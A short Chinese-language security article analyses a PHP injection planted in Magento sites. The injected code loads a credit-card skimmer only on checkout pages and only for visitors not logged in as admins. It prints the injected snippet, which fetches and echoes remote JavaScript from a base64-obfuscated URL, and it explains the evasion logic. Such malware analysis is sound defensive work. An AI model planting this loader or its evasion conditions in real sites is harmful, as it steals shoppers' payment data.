Magento PHP注入加载JavaScript Skimmer

点击上方蓝字关注我们

...if ($_SERVER["REQUEST_METHOD"] === "GET"){              if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){                  if(!isset($_COOKIE["adminhtml"])){                      echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));                  }              }          }

为了使其更难以被检测，该JavaScript skimmer使用了PHP函数file_get_contents进行加载，并对URL进行base64混淆。

作为附加的规避操作，该skimmer仅在满足以下两个条件时才会加载：

• 访客在结帐页面上

• 访客未以管理员用户身份登录到Magento网站
  

该PHP代码通过在访问者请求的URI中，查找带有strpos的文本字符串“/onestepcheckout/index/”来检查是否在结账页面上。此外，它还会检查访问者是否具有adminhtml cookie，这将指示访问者是否以admin用户身份登录到Magento网站。

对于电子商务网站来说，信用卡skimmer是一个持续存在的问题。它们不仅对您的网站有严重影响，而且还使客户面临身份盗窃或信用卡欺诈的风险，最终可能导致PCI合规性问题。

而且，当恶意攻击者不断使用新的技术和规避手段更新其恶意软件时，电子商务网站更应积极的采取措施来保护其用户和收入流。

为了降低风险并防止感染，请在可用的最新安全修补程序可用后立即安装，并遵循网站强化指南，利用Web应用程序防火墙对所有已知漏洞进行修补。

END

本文始发于微信公众号（SecTr安全团队）：Magento PHP注入加载JavaScript Skimmer